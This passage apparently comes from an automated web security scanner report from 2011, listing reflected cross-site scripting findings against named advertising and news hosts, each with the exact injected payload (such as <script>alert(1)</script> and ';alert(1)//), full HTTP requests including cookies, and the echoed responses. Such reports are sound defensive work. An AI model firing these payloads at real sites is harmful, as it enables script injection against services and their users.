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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3hc5wP0KOeR1HOKnJulKw7Gjxf3XhmS6ZRcEqjvfcyeCFF4B1O4aWkEexyvJQAX9QTRhUPRts5fz5olxbKmmdQyl8FAjgCJ9BkYHf6k5uO7xf+0Z446YiKwN98DKIMATvgWrmYCuFq8DrU62W2y+J0RcKV+7KLdc2Kss4QNPi+caKUK8opkoifwTWbaJ2CPT0/sWwdhiKletVKtZk25ptnIY2owSKFkTCt/Ngox6yb8H4Qmo+r/fFIzBuqyzh9puR+3OJL7V+cLHyAboeo8bMwNHvUDRgtoZUmEUgzV/4Yllxn+lud06KQW6QEDsZTtl2P5ajd+KZOf4kxeFOuxKRJr9JnNc7h3keJ6d19frL14byag6euLSAIchdFwAG2/9K1DyiO9XZAGNCTJ5OPPy3IQiDlZ3tMvME/N7wOwqRFZfPCS5wO2BYl3oXK9435afkrQi8RxG9y415IJqcuH3tJlthLHmyEONPSFETtDMs2MN+xTbLVD59/ag+erLWsWV3rsJqp5iDYViC0n8k53RYNJ9X8SBNdwZn4LkBYOJiuycj2WFeVY97PadEc6VgNtdWayDUh6dnxVOIePkJADN/gVS5jzDGNdp9+fqOCZN6J+TCe/hcIF6NTDiJBEY2GvgCXLI5ZK1ExXWTC7Ej3a3eEmAINqMKb9d6OUkQUyailyWKfp1gM7DUC57V54PaQo8ssofBVab3gj3syv6FBVuUikJmD39VeLPdrz61YZR3q/obVUakRCI17rTu9yCMuT0goa4ho+D3q4UAoSAiorN/DDuud2tXL3W9E5ESoT/LzfeKDu4B1MKyau3YPu4Hl1tJwElVdF4Ts7WNFeed/E7sj/sM3Qynmap/a5qvCdThMeG/FxbO/Bnx6jWsJReHowxfBbe+mMXihG9SIzAjq+nqjB9iIAFIy8ThxTU0pvUIB4VCgTWM1ImZutw9mU2pQDB6H/L0aIukHMfsCpkUhnRpmSMwl8LtVcsyPmlK+SSG7PLlkG+mRWjdHU48zeHHjnyro7uwtTKRM5RVxsuP3xrutm5ICMIhLTXFxzBs67HL1TNPZx6vhaWGQr9+qnX65af0TL9kLNlZVhbRjZ2Vsj3Uxi+/Yk12FWMJ0KNl9GZHtEhD7JHRkPockyzMvrN4wD4ZLtBRRRVoas1rh5DXr4pa8fgbo5U4HXKgzOv2fZFWiCP6HYTvK9qDi2bm6jWrZANAnI3WaXh3g/YUsGIYyqNTKYKRnZ9FIM7TqYCps4s2J4tYDoI4RbT/fbQpOgVYK6d3lgCCFLoBzamEizc907+tcMMKvH4UUUaVqX4tfrNFIC5CWQ1oyBSVDu8mHuZ3f2Obyp/D5hNzLqRtyR5ybfaapdy8Vly7HBYWEnH+XoyQVVUs2p2H7pqO9DS4wcvFvPslRQpZ8AhJQdWufY/mUyr+EGgxdjYl4ZwU9t+1I6/iR1D1GMMCSwVPsbPu8MjAe+Ve8t546iEFY+CJH6N/5bf6zWP89G2vO7C/tIoIhP2phBokVl2FOnZDrWF8ZUVNh512yqHNwh8rlIuQMQE9e9sRNW8S1+T5LWw89zXYZOX5t1qidcpX0qh0HFodev+a2s3EKWHVHh3O+wuHiS3KfqW6EikbD92yXRWEiaCRfyCDKaOSOzdmpS+HTY2N6oG4+Fw+24heiLmg1lW92sssp+TAOfj63M0Jzcru5LddgUtxts3CCFKakqADSe+eHg172VvCIYhJyqcHG37xfllpn/pCrYwrXKXfHmSAyxEyuF821arD2l3glM23GlRs2by2yCMWzBYrTm7ZOYVrdezLnknAf4GxTXDYfXHtjGrMXnfcC+ZqIP+Pnw0830xvuqWUnZCySqZbnodhMg=; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:00:57 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:00:57 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:00:57 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:00:57 GMT
Content-Length: 6234

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...
d].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','432');
A10868.DM_addEncToLoc('vid', '6127792daf36';alert(1)//6fb0941c0');
A10868.DM_addEncToLoc('pid', '456378');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '1887835');
A10868.DM_addEncToLoc('ali', '3130307');
A10868.DM_addEncToLoc('cid', '9518
...[SNIP]...

1.316. http://newspulse.cnn.com/widget/json/social [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newspulse.cnn.com
Path:   /widget/json/social

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2b8ee<script>alert(1)</script>8ca7e44b2ae was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/json/social?callback=ArchiveSocialManagerRequest2b8ee<script>alert(1)</script>8ca7e44b2ae&ids=4f00b3b7878a5d814d7c44cd625688df%2C1b32b25c6908119e80860e4a524cc96d%2C12dfa4470da14ac796a82be9e63c6819%2Cfdcff9bf0c98b3e10f4dbc7a1b7d0246%2Cb9bdc32570090581508881d018db7bca%2C04b22d57b01cf486fde7a76e0d66b836 HTTP/1.1
Host: newspulse.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-880419330-1305981351672; s_vi=[CS]v1|26EBD903051D00FC-60000128000842F6[CE]; __switchTo5x=68; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; __unam=7549672-130313f47dd-2d6d1144-2

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:24:05 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Expires: Tue, 28 Jun 2011 01:29:06 GMT
Last-Modified: Tue, 28 Jun 2011 01:24:06 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 440

ArchiveSocialManagerRequest2b8ee<script>alert(1)</script>8ca7e44b2ae([{"hash":"1b32b25c6908119e80860e4a524cc96d","facebook":12140,"comments":2116},{"hash":"12dfa4470da14ac796a82be9e63c6819","facebook":557,"comments":115},{"hash":"fdcff9bf0c98b3e10f4dbc7a1b7d0246","face
...[SNIP]...

1.317. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 87576<script>alert(1)</script>2b320a1fbcb was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=932946&cmp=5383603&plc=63006897&sid=17306&num=5&ver=2&dv_url=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3DINSERT_RANDOM_NUMBER_HERE%26loc%3D&callback=__verify_callback_62697038403787576<script>alert(1)</script>2b320a1fbcb HTTP/1.1
Host: rtb50.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Tue, 28 Jun 2011 02:31:57 GMT
Connection: close
Content-Length: 74

__verify_callback_62697038403787576<script>alert(1)</script>2b320a1fbcb(2)

1.318. http://sat.scoutanalytics.com/trb9r/Sat.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sat.scoutanalytics.com
Path:   /trb9r/Sat.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3d98'%3balert(1)//96a35180c18 was submitted in the id parameter. This input was echoed as e3d98';alert(1)//96a35180c18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trb9r/Sat.ashx?id=c0d1ee0f-bd81-41e3-bdb6-7567961f8f42e3d98'%3balert(1)//96a35180c18&sn=0881d12b-16d1-48ea-810a-cb40bd7ae95b&msg=&type=0&url=http%3A%2F%2Fscoutanalytics.com%2F&rf=&used=false HTTP/1.1
Host: sat.scoutanalytics.com
Proxy-Connection: keep-alive
Referer: http://scoutanalytics.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=31402941.1309224825.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=31402941.1172214360.1309224825.1309224825.1309224825.1; __utmc=31402941; __utmb=31402941.1.10.1309224825

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Jun 2010 01:34:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: NRV3
Date: Tue, 28 Jun 2011 01:34:20 GMT
Content-Length: 601


<html><head>
<script type='text/javascript'>var ADMITONE; if (!ADMITONE) { ADMITONE = {}; } ADMITONE.pageHitUrl = 'http://sat.scoutanalytics.com/trb9r/PageHit.aspx'; ADMITONE.transactionid = 'c0d1ee0f-bd81-41e3-bdb6-7567961f8f42e3d98';alert(1)//96a35180c18'; ADMITONE.sessionid = '0881d12b-16d1-48ea-810a-cb40bd7ae95b'; ADMITONE.doFullSilentCollection = true;</script>
...[SNIP]...

1.319. http://sat.scoutanalytics.com/trb9r/Sat.ashx [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sat.scoutanalytics.com
Path:   /trb9r/Sat.ashx

Issue detail

The value of the sn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fb74'%3balert(1)//cbe4961c546 was submitted in the sn parameter. This input was echoed as 1fb74';alert(1)//cbe4961c546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trb9r/Sat.ashx?id=c0d1ee0f-bd81-41e3-bdb6-7567961f8f42&sn=0881d12b-16d1-48ea-810a-cb40bd7ae95b1fb74'%3balert(1)//cbe4961c546&msg=&type=0&url=http%3A%2F%2Fscoutanalytics.com%2F&rf=&used=false HTTP/1.1
Host: sat.scoutanalytics.com
Proxy-Connection: keep-alive
Referer: http://scoutanalytics.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=31402941.1309224825.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=31402941.1172214360.1309224825.1309224825.1309224825.1; __utmc=31402941; __utmb=31402941.1.10.1309224825

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Jun 2010 01:34:23 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: NRV3
Date: Tue, 28 Jun 2011 01:34:22 GMT
Content-Length: 601


<html><head>
<script type='text/javascript'>var ADMITONE; if (!ADMITONE) { ADMITONE = {}; } ADMITONE.pageHitUrl = 'http://sat.scoutanalytics.com/trb9r/PageHit.aspx'; ADMITONE.transactionid = 'c0d1ee0f-bd81-41e3-bdb6-7567961f8f42'; ADMITONE.sessionid = '0881d12b-16d1-48ea-810a-cb40bd7ae95b1fb74';alert(1)//cbe4961c546'; ADMITONE.doFullSilentCollection = true;</script>
...[SNIP]...

1.320. http://scout.scoutanalytics.net/fr8c8/Sat.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scout.scoutanalytics.net
Path:   /fr8c8/Sat.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e0bb'%3balert(1)//02cdfcf8aaf was submitted in the id parameter. This input was echoed as 9e0bb';alert(1)//02cdfcf8aaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fr8c8/Sat.ashx?id=10aaeb19-3a63-41b5-8261-13a1eab5432e9e0bb'%3balert(1)//02cdfcf8aaf&sn=3e393c94-f887-477b-92b5-62d71990ffad&msg=&type=0&url=http%3A%2F%2Fwww.businessinsider.com%2Fhenry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6&rf=&ct=section%3Dsai%26contentType%3Dstory%26contentTitle%3Dhenry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6%26author%3DHenry%2520Blodget%26contentDate%3D2009-06-28&used=false HTTP/1.1
Host: scout.scoutanalytics.net
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/henry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Jun 2010 01:23:34 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: NRV2
Date: Tue, 28 Jun 2011 01:23:34 GMT
Content-Length: 605


<html><head>
<script type='text/javascript'>var ADMITONE; if (!ADMITONE) { ADMITONE = {}; } ADMITONE.pageHitUrl = 'http://scout.scoutanalytics.net/fr8c8/PageHit.aspx'; ADMITONE.transactionid = '10aaeb19-3a63-41b5-8261-13a1eab5432e9e0bb';alert(1)//02cdfcf8aaf'; ADMITONE.sessionid = '3e393c94-f887-477b-92b5-62d71990ffad'; ADMITONE.doFullSilentCollection = true;</script>
...[SNIP]...

1.321. http://scout.scoutanalytics.net/fr8c8/Sat.ashx [sn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scout.scoutanalytics.net
Path:   /fr8c8/Sat.ashx

Issue detail

The value of the sn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54e11'%3balert(1)//2727a6f722c was submitted in the sn parameter. This input was echoed as 54e11';alert(1)//2727a6f722c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fr8c8/Sat.ashx?id=10aaeb19-3a63-41b5-8261-13a1eab5432e&sn=3e393c94-f887-477b-92b5-62d71990ffad54e11'%3balert(1)//2727a6f722c&msg=&type=0&url=http%3A%2F%2Fwww.businessinsider.com%2Fhenry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6&rf=&ct=section%3Dsai%26contentType%3Dstory%26contentTitle%3Dhenry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6%26author%3DHenry%2520Blodget%26contentDate%3D2009-06-28&used=false HTTP/1.1
Host: scout.scoutanalytics.net
Proxy-Connection: keep-alive
Referer: http://www.businessinsider.com/henry-blodget-finally-another-option-for-private-investors-who-cant-dump-stock-in-an-ipo-2009-6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Expires: Mon, 28 Jun 2010 01:23:36 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: NRV2
Date: Tue, 28 Jun 2011 01:23:36 GMT
Content-Length: 605


<html><head>
<script type='text/javascript'>var ADMITONE; if (!ADMITONE) { ADMITONE = {}; } ADMITONE.pageHitUrl = 'http://scout.scoutanalytics.net/fr8c8/PageHit.aspx'; ADMITONE.transactionid = '10aaeb19-3a63-41b5-8261-13a1eab5432e'; ADMITONE.sessionid = '3e393c94-f887-477b-92b5-62d71990ffad54e11';alert(1)//2727a6f722c'; ADMITONE.doFullSilentCollection = true;</script>
...[SNIP]...

1.322. http://segs.btrll.com/partner/bluekai/tpix [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://segs.btrll.com
Path:   /partner/bluekai/tpix

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59bf0<a>25fe0888b3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /partner/bluekai59bf0<a>25fe0888b3c/tpix?p=12329|12330|12334|14821|14832|14840|14856|25215|25253|25320|25324|26353|26354|26355|30737|30961|32177|32748|32833|33636|34131|54914|54938|72613|72614|72627|73261|120425|120439|120449|123914|123918|129719|129721 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
